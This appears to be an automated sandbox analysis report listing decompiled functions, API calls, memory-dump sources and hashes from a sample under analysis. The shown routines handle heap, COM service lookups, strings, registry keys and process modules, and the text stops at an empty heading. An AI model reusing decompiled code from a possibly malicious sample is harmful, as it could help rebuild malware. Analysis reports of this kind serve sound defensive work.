                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: Heap$Allocate$Freelstrlen
                              • String ID: Uxt
                              • API String ID: 2220322926-1536154274
                              • Opcode ID: 3e037e3fa719b851732c68e314e493f970281b2bbaf37d98a42b77fb4a0adaad
                              • Instruction ID: c899decd2081fd5963157b53b043a1f5a324944bbfa9a625c77e1374e1da4699
                              • Opcode Fuzzy Hash: 3e037e3fa719b851732c68e314e493f970281b2bbaf37d98a42b77fb4a0adaad
                              • Instruction Fuzzy Hash: E7014B76200218FBDB22CF48DC04E9A7BE9EB58354F118025FA05AA5A0E731EA54DB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E6DFA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 5memoryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E013E6DFA(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x13ed270, 0, _a4); // executed
				return _t2;
			}




                              0x013e6e06
                              0x013e6e0c

                              APIs
                              • RtlFreeHeap.NTDLL(00000000,00000000,013E55CD,00000000,?,?,00000000), ref: 013E6E06
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: FreeHeap
                              • String ID: Uxt
                              • API String ID: 3298025750-1536154274
                              • Opcode ID: 3d27eba6521cf9335affa87d872dc72d40b8e47c74bbd590179a070ceb060429
                              • Instruction ID: 075f76f14dd4266f0b2cbd0db799e82690634079a4b7902d72c3ef007c8544dd
                              • Opcode Fuzzy Hash: 3d27eba6521cf9335affa87d872dc72d40b8e47c74bbd590179a070ceb060429
                              • Instruction Fuzzy Hash: 30B01271000300EBCE314B50DE09F097FB5B750700F019411F2000C0E8C2318820EB15
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E4176, Relevance: 3.1, APIs: 2, Instructions: 147serviceCOMMON
                              Download Yara Rule
                              C-Code - Quality: 38%
                              			E013E4176(intOrPtr _a4) {
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v40;
				void* _v46;
				short _v48;
				intOrPtr _t49;
				void* _t51;
				intOrPtr* _t53;
				intOrPtr _t56;
				void* _t58;
				intOrPtr* _t59;
				intOrPtr* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr _t76;
				intOrPtr* _t79;
				short _t81;
				char* _t97;
				intOrPtr _t99;
				void* _t105;
				void* _t107;
				intOrPtr _t111;

				_t81 = 0;
				_v48 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t49 =  *0x13ed2b8; // 0x26ea5a8
				_t4 = _t49 + 0x13ee44c; // 0x3ad89f4
				_t5 = _t49 + 0x13ee43c; // 0x9ba05972
				_t51 =  *0x13ed124(_t5, 0, 4, _t4,  &_v20); // executed
				_t105 = _t51;
				if(_t105 >= 0) {
					_t53 = _v20;
					_push( &_v12);
					_push(1);
					_push( &_v32);
					_push(8);
					_t97 =  &_v48;
					_push(_t97);
					_push(_t97);
					_push(_t53); // executed
					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
						_t56 =  *0x13ed2b8; // 0x26ea5a8
						_t30 = _t56 + 0x13ee42c; // 0x3ad89d4
						_t31 = _t56 + 0x13ee45c; // 0x4c96be40
						_t58 =  *0x13ed0f0(_v12, _t31, _t30,  &_v24); // executed
						_t105 = _t58;
						_t59 = _v12;
						 *((intOrPtr*)( *_t59 + 8))(_t59);
						goto L11;
					} else {
						_t71 = _v20;
						_v16 = 0;
						_t105 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
						if(_t105 >= 0) {
							_t111 = _v16;
							if(_t111 == 0) {
								_t105 = 0x80004005;
								goto L11;
							} else {
								if(_t111 <= 0) {
									L11:
									if(_t105 >= 0) {
										goto L12;
									}
								} else {
									do {
										_t73 = _v20;
										_v48 = 3;
										_v40 = _t81;
										_t107 = _t107 - 0x10;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t105 =  *((intOrPtr*)( *_t73 + 0x20))(_t73,  &_v12);
										if(_t105 < 0) {
											goto L7;
										} else {
											_t76 =  *0x13ed2b8; // 0x26ea5a8
											_t23 = _t76 + 0x13ee42c; // 0x3ad89d4
											_t24 = _t76 + 0x13ee45c; // 0x4c96be40
											_t105 =  *0x13ed0f0(_v12, _t24, _t23,  &_v24);
											_t79 = _v12;
											 *((intOrPtr*)( *_t79 + 8))(_t79);
											if(_t105 >= 0) {
												L12:
												_t63 = _v24;
												_t105 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
												if(_t105 >= 0) {
													_t99 =  *0x13ed2b8; // 0x26ea5a8
													_t67 = _v28;
													_t40 = _t99 + 0x13ee41c; // 0x214e3
													_t105 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
													_t69 = _v28;
													 *((intOrPtr*)( *_t69 + 8))(_t69);
												}
												_t65 = _v24;
												 *((intOrPtr*)( *_t65 + 8))(_t65);
											} else {
												goto L7;
											}
										}
										goto L15;
										L7:
										_t81 = _t81 + 1;
									} while (_t81 < _v16);
									goto L11;
								}
							}
						}
					}
					L15:
					_t61 = _v20;
					 *((intOrPtr*)( *_t61 + 8))(_t61);
				}
				return _t105;
			}

































                              0x013e4181
                              0x013e4183
                              0x013e418a
                              0x013e418b
                              0x013e418c
                              0x013e418d
                              0x013e4193
                              0x013e4198
                              0x013e41a2
                              0x013e41a9
                              0x013e41af
                              0x013e41b3
                              0x013e41b9
                              0x013e41c1
                              0x013e41c2
                              0x013e41c7
                              0x013e41c8
                              0x013e41ca
                              0x013e41cd
                              0x013e41ce
                              0x013e41cf
                              0x013e41d5
                              0x013e426a
                              0x013e426f
                              0x013e4276
                              0x013e4280
                              0x013e4286
                              0x013e4288
                              0x013e428e
                              0x00000000
                              0x013e41db
                              0x013e41db
                              0x013e41e2
                              0x013e41eb
                              0x013e41ef
                              0x013e41f5
                              0x013e41f8
                              0x013e425f
                              0x00000000
                              0x013e41fa
                              0x013e41fa
                              0x013e4291
                              0x013e4293
                              0x00000000
                              0x00000000
                              0x013e4200
                              0x013e4200
                              0x013e4200
                              0x013e4207
                              0x013e420d
                              0x013e4212
                              0x013e421a
                              0x013e421b
                              0x013e421c
                              0x013e421e
                              0x013e4222
                              0x013e4226
                              0x00000000
                              0x013e4228
                              0x013e422c
                              0x013e4231
                              0x013e4238
                              0x013e4248
                              0x013e424a
                              0x013e4250
                              0x013e4255
                              0x013e4295
                              0x013e4295
                              0x013e42a2
                              0x013e42a6
                              0x013e42ab
                              0x013e42b1
                              0x013e42b6
                              0x013e42c0
                              0x013e42c2
                              0x013e42c8
                              0x013e42c8
                              0x013e42cb
                              0x013e42d1
                              0x00000000
                              0x00000000
                              0x00000000
                              0x013e4255
                              0x00000000
                              0x013e4257
                              0x013e4257
                              0x013e4258
                              0x00000000
                              0x013e425d
                              0x013e41fa
                              0x013e41f8
                              0x013e41ef
                              0x013e42d4
                              0x013e42d4
                              0x013e42da
                              0x013e42da
                              0x013e42e3

                              APIs
                              • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,03AD89D4,013E6FE2,?,?,?,?,?,?,?,?,?,?,?,013E6FE2), ref: 013E4242
                              • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,03AD89D4,013E6FE2,?,?,?,?,?,?,?,013E6FE2,00000000,00000000,00000000,006D0063), ref: 013E4280
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: QueryServiceUnknown_
                              • String ID:
                              • API String ID: 2042360610-0
                              • Opcode ID: 9b1eb09379efbbe125905c5b84215dab7e304c6c60cfd62c878b13772c3cc27b
                              • Instruction ID: 87103a19e462fc6fd8f31cf1a55494ef63a2fc739b5f60db45a429b56e51ca9b
                              • Opcode Fuzzy Hash: 9b1eb09379efbbe125905c5b84215dab7e304c6c60cfd62c878b13772c3cc27b
                              • Instruction Fuzzy Hash: 96512F75900219AFDB10CFE8C898DAEB7F9FF8C714B048558EA15EB290D731A945CF61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E5A5E, Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                              Download Yara Rule
                              C-Code - Quality: 75%
                              			E013E5A5E(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E013E6A4D(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x13ed2b8; // 0x26ea5a8
						_t20 = _t68 + 0x13ee1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E013E4B0E(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                              0x013e5a64
                              0x013e5a67
                              0x013e5a77
                              0x013e5a80
                              0x013e5a84
                              0x013e5b52
                              0x013e5b58
                              0x013e5b58
                              0x013e5a9e
                              0x013e5aa3
                              0x013e5aa7
                              0x013e5aad
                              0x013e5ab2
                              0x013e5ab9
                              0x013e5ac8
                              0x013e5ac8
                              0x013e5acc
                              0x013e5ace
                              0x013e5ada
                              0x013e5ae5
                              0x013e5af0
                              0x013e5af4
                              0x013e5afe
                              0x013e5b02
                              0x013e5b04
                              0x013e5b09
                              0x013e5b10
                              0x013e5b20
                              0x013e5b20
                              0x013e5b09
                              0x013e5b02
                              0x013e5b22
                              0x013e5b27
                              0x013e5b2c
                              0x013e5b2c
                              0x013e5b32
                              0x013e5b38
                              0x013e5b3d
                              0x013e5b3d
                              0x013e5b42
                              0x013e5b47
                              0x013e5b47
                              0x013e5b42
                              0x013e5acc
                              0x013e5b49
                              0x013e5b4f
                              0x00000000

                              APIs
                                • Part of subcall function 013E6A4D: SysAllocString.OLEAUT32(80000002), ref: 013E6AA4
                                • Part of subcall function 013E6A4D: SysFreeString.OLEAUT32(00000000), ref: 013E6B09
                              • SysFreeString.OLEAUT32(?), ref: 013E5B3D
                              • SysFreeString.OLEAUT32(013E4993), ref: 013E5B47
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: String$Free$Alloc
                              • String ID:
                              • API String ID: 986138563-0
                              • Opcode ID: f648fa95245fa9df9780e85bd386645097aea0826e7a28d99f7721ef5b062c73
                              • Instruction ID: 43b03e9a538097fa20e0f6c5cfbdb7c07701423890f5fbe765298cf7dd76b78c
                              • Opcode Fuzzy Hash: f648fa95245fa9df9780e85bd386645097aea0826e7a28d99f7721ef5b062c73
                              • Instruction Fuzzy Hash: 8531397A50022AEFCF21DF99D888C9BBBB9FFC97487144658F9059B250D231ED51CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01036486, Relevance: 3.1, APIs: 2, Instructions: 81registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegCreateKeyA.ADVAPI32(80000001,04B3B7F0,04B38560), ref: 010364F3
                              • RegOpenKeyA.ADVAPI32(80000001,04B3B7F0,04B38560), ref: 010364FD
                              • lstrlen.KERNEL32(04B3B7F0,00000000,00000000,0104F072,?,?,?,0102FFEA,00000001,00000001,04B38560), ref: 0103651C
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CreateOpenlstrlen
                              • String ID:
                              • API String ID: 2865187142-0
                              • Opcode ID: 559ab40f3eea43cf6f337c596cc65a39104147c0659c30b615762fb398a6fda1
                              • Instruction ID: 89ab2fef07b568694d037bc398ddc4be35815beb5ce9468828a1c832fc995c4b
                              • Opcode Fuzzy Hash: 559ab40f3eea43cf6f337c596cc65a39104147c0659c30b615762fb398a6fda1
                              • Instruction Fuzzy Hash: A1214A76180205EFD751CFA4E896AD577F8FF42364F3881AEE841CA211D33AA946CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102FFB7, Relevance: 3.1, APIs: 2, Instructions: 80registryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 010364DE: RegCreateKeyA.ADVAPI32(80000001,04B3B7F0,04B38560), ref: 010364F3
                                • Part of subcall function 010364DE: lstrlen.KERNEL32(04B3B7F0,00000000,00000000,0104F072,?,?,?,0102FFEA,00000001,00000001,04B38560), ref: 0103651C
                              • RegQueryValueExA.KERNELBASE(00000001,04B38560,00000000,?,0104F06C,00000000,00000001,00000001,04B38560,0104F072,00000000,?,?,?,04B38560,00000001), ref: 0103000B
                              • RegCloseKey.ADVAPI32(?), ref: 01030054
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CloseCreateQueryValuelstrlen
                              • String ID:
                              • API String ID: 971780412-0
                              • Opcode ID: 8f22a72830c31df18fa2d0350c151d2b4d15ef76a0602f8addb5c1e65f6e5202
                              • Instruction ID: 0bbb6a689bb59d87e8cdadb36fd41dd89e29084b81e427dd2a9565f756354ab7
                              • Opcode Fuzzy Hash: 8f22a72830c31df18fa2d0350c151d2b4d15ef76a0602f8addb5c1e65f6e5202
                              • Instruction Fuzzy Hash: FB3141B5D0121AEFDB21DF99D9809AEBBFCFB84751F1081A6F584E2109C7755A40CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E5F72, Relevance: 3.1, APIs: 2, Instructions: 62COMMON
                              Download Yara Rule
                              C-Code - Quality: 50%
                              			E013E5F72(intOrPtr* __eax, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				intOrPtr* _t22;
				void* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t31;
				intOrPtr* _t32;
				intOrPtr _t42;
				intOrPtr _t45;
				intOrPtr _t48;
				void* _t51;

				_push( &_v16);
				_t42 =  *0x13ed2b8; // 0x26ea5a8
				_t2 = _t42 + 0x13ee46c; // 0x20400
				_push(0);
				_push(__eax); // executed
				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
				if(_t51 >= 0) {
					_t22 = _v16;
					_t45 =  *0x13ed2b8; // 0x26ea5a8
					_t6 = _t45 + 0x13ee48c; // 0xe7a1af80
					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
					_t51 = _t23;
					if(_t51 >= 0) {
						_t26 = _v12;
						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
						if(_t51 >= 0) {
							_t48 =  *0x13ed2b8; // 0x26ea5a8
							_t30 = _v8;
							_t12 = _t48 + 0x13ee47c; // 0xa4c6892c
							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
							_t51 = _t31;
							_t32 = _v8;
							 *((intOrPtr*)( *_t32 + 8))(_t32);
						}
						_t28 = _v12;
						 *((intOrPtr*)( *_t28 + 8))(_t28);
					}
					_t24 = _v16;
					 *((intOrPtr*)( *_t24 + 8))(_t24);
				}
				return _t51;
			}


















                              0x013e5f7e
                              0x013e5f7f
                              0x013e5f85
                              0x013e5f8c
                              0x013e5f8e
                              0x013e5f92
                              0x013e5f96
                              0x013e5f98
                              0x013e5fa1
                              0x013e5fa7
                              0x013e5faf
                              0x013e5fb1
                              0x013e5fb5
                              0x013e5fb7
                              0x013e5fc4
                              0x013e5fc8
                              0x013e5fcd
                              0x013e5fd3
                              0x013e5fd8
                              0x013e5fe0
                              0x013e5fe2
                              0x013e5fe4
                              0x013e5fea
                              0x013e5fea
                              0x013e5fed
                              0x013e5ff3
                              0x013e5ff3
                              0x013e5ff6
                              0x013e5ffc
                              0x013e5ffc
                              0x013e6003

                              APIs
                              • IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 013E5FAF
                              • IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 013E5FE0
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: Interface_ProxyQueryUnknown_
                              • String ID:
                              • API String ID: 2522245112-0
                              • Opcode ID: 7813ba11c36c5661c218e59e67bcfe8aa518f0a2f61765d561ddeea5a8e45b1f
                              • Instruction ID: 7a0564e411da84dc41dd57dfac64f057377dcc3f15bb116172f72a84a69cfdc5
                              • Opcode Fuzzy Hash: 7813ba11c36c5661c218e59e67bcfe8aa518f0a2f61765d561ddeea5a8e45b1f
                              • Instruction Fuzzy Hash: 52215E7590071AEFCB10CFA8C448D5AB7B9EF88714B108694E905EF354D630ED05CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103CDFE, Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • EnumProcessModules.PSAPI(00000008,00000000,00001000,00000000,00001000,00000000,00000104,00000000,?), ref: 0103CE2E
                              • GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000,00000000,00000104,00000000), ref: 0103CE75
                                • Part of subcall function 010469F0: RtlFreeHeap.NTDLL(00000000,?,010262C2,00000000), ref: 010469FC
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$AllocateEnumErrorFreeLastModulesProcess
                              • String ID:
                              • API String ID: 552344955-0
                              • Opcode ID: f10a734af97f29c5ad8bfd3f6889c0c6e56978e10c3acb31b99be96c8d31a6b5
                              • Instruction ID: d9ca08b9ab6b6656f20764d889bfa917643cb0c6ef8b921f7f45b1d9845c3344
                              • Opcode Fuzzy Hash: f10a734af97f29c5ad8bfd3f6889c0c6e56978e10c3acb31b99be96c8d31a6b5
                              • Instruction Fuzzy Hash: 38118676900209BBE7119FACC984BDEBBFCEFD1754F10406AE594E7200DB758E048B60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103943B, Relevance: 3.1, APIs: 2, Instructions: 54memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,?,00000000,69B25F44,00000000,01024FAB), ref: 01039478
                              • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,01024FAB,?,00000000), ref: 010394D9
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Time$FileFreeHeapSystem
                              • String ID:
                              • API String ID: 892271797-0
                              • Opcode ID: 2b3cca8aec15b4d1f8439c639a2fedda9f70f746b5e30a6b52895e690ff26aeb
                              • Instruction ID: 5b10baf37025f4e278e4d68c1b9ea5eb3ee5ce402eaf308475a6a6b9603f2c52
                              • Opcode Fuzzy Hash: 2b3cca8aec15b4d1f8439c639a2fedda9f70f746b5e30a6b52895e690ff26aeb
                              • Instruction Fuzzy Hash: D811F8B5D0030AEFDB61EBA4D948ADFB7BCAB48305F1040A2F981E2149DB799B44CB51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E249A, Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                              Download Yara Rule
                              APIs
                              • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 013E24C2
                                • Part of subcall function 013E5A5E: SysFreeString.OLEAUT32(?), ref: 013E5B3D
                              • SafeArrayDestroy.OLEAUT32(?), ref: 013E250F
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: ArraySafe$CreateDestroyFreeString
                              • String ID:
                              • API String ID: 3098518882-0
                              • Opcode ID: c2a670cd7a4df35567e2e4a30e3046467ba40990771a5073c01fc3263f6cc46e
                              • Instruction ID: 1489944721720c577e8380b9eb1f78824b5f074ff008573f27789508d4f32950
                              • Opcode Fuzzy Hash: c2a670cd7a4df35567e2e4a30e3046467ba40990771a5073c01fc3263f6cc46e
                              • Instruction Fuzzy Hash: 6F113072900619BFDB11DF98CC48EEEBBF9AB18314F008025FA05A61A0D770DA55CF91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E262B, Relevance: 3.0, APIs: 2, Instructions: 42memoryCOMMON
                              Download Yara Rule
                              APIs
                              • SysAllocString.OLEAUT32(013EA6E1), ref: 013E2645
                                • Part of subcall function 013E5A5E: SysFreeString.OLEAUT32(?), ref: 013E5B3D
                              • SysFreeString.OLEAUT32(00000000), ref: 013E2685
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: String$Free$Alloc
                              • String ID:
                              • API String ID: 986138563-0
                              • Opcode ID: a42d7bd266889de61350bdb4ef7cea0428776fd26188b8dbcfb9ab0c3be34ddb
                              • Instruction ID: faabe891db798ea9c05af6fa9f3952a8597b88b4488f48eee230a7f774c61cb5
                              • Opcode Fuzzy Hash: a42d7bd266889de61350bdb4ef7cea0428776fd26188b8dbcfb9ab0c3be34ddb
                              • Instruction Fuzzy Hash: FD014F7290031ABFDB219F69D808D9FBBFDEF44314B014021EA05A61A0D770DA198BA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013EA415, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 42memoryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E013EA415(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
				void* _t24;
				signed short _t25;
				signed int _t27;
				intOrPtr* _t28;
				signed short _t29;

				_t28 = __edi;
				if(_a4 == 0) {
					L2:
					_t29 = E013E5607(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t29 == 0) {
						_t27 = _a12 >> 1;
						if(_t27 == 0) {
							_t29 = 2;
							HeapFree( *0x13ed270, 0, _a4);
						} else {
							_t24 = _a4;
							 *(_t24 + _t27 * 2 - 2) =  *(_t24 + _t27 * 2 - 2) & _t29;
							 *_t28 = _t24;
						}
					}
					L6:
					return _t29;
				}
				_t25 = E013E3196(_a4, _a8, _a12, __edi); // executed
				_t29 = _t25;
				if(_t29 == 0) {
					goto L6;
				}
				goto L2;
			}








                              0x013ea415
                              0x013ea41d
                              0x013ea434
                              0x013ea44f
                              0x013ea453
                              0x013ea458
                              0x013ea45a
                              0x013ea46a
                              0x013ea476
                              0x013ea45c
                              0x013ea45c
                              0x013ea45f
                              0x013ea464
                              0x013ea464
                              0x013ea45a
                              0x013ea47c
                              0x013ea480
                              0x013ea480
                              0x013ea429
                              0x013ea42e
                              0x013ea432
                              0x00000000
                              0x00000000
                              0x00000000

                              APIs
                                • Part of subcall function 013E3196: SysFreeString.OLEAUT32(00000000), ref: 013E31FC
                              • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,747DF710,?,00000000,?,00000000,?,013E4C93,?,004F0053,03AD93B8,00000000,?), ref: 013EA476
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: Free$HeapString
                              • String ID: Uxt
                              • API String ID: 3806048269-1536154274
                              • Opcode ID: 9ea123522ede6ec615d180a4fbfabf81e2d808af052a40e663e6f19ea717ffe2
                              • Instruction ID: 02dd008acf274617023d087990282ce49c609eb93cff1ec28cd01a67c16e8339
                              • Opcode Fuzzy Hash: 9ea123522ede6ec615d180a4fbfabf81e2d808af052a40e663e6f19ea717ffe2
                              • Instruction Fuzzy Hash: 9B012832000269BBCB229F48CC09FEA3FA9FB04795F058019FE056A2A0C731D920DB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E40AC, Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                              Download Yara Rule
                              C-Code - Quality: 37%
                              			E013E40AC(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E013E55DC(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E013E6DFA(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                              0x013e40b1
                              0x013e40bc
                              0x013e40be
                              0x013e40c4
                              0x013e40c6
                              0x013e40cb
                              0x013e40d4
                              0x013e40d8
                              0x013e40e1
                              0x013e40e5
                              0x013e40f4
                              0x013e40e7
                              0x013e40e8
                              0x013e40ed
                              0x013e40ed
                              0x013e40e5
                              0x013e40d8
                              0x013e40fd

                              APIs
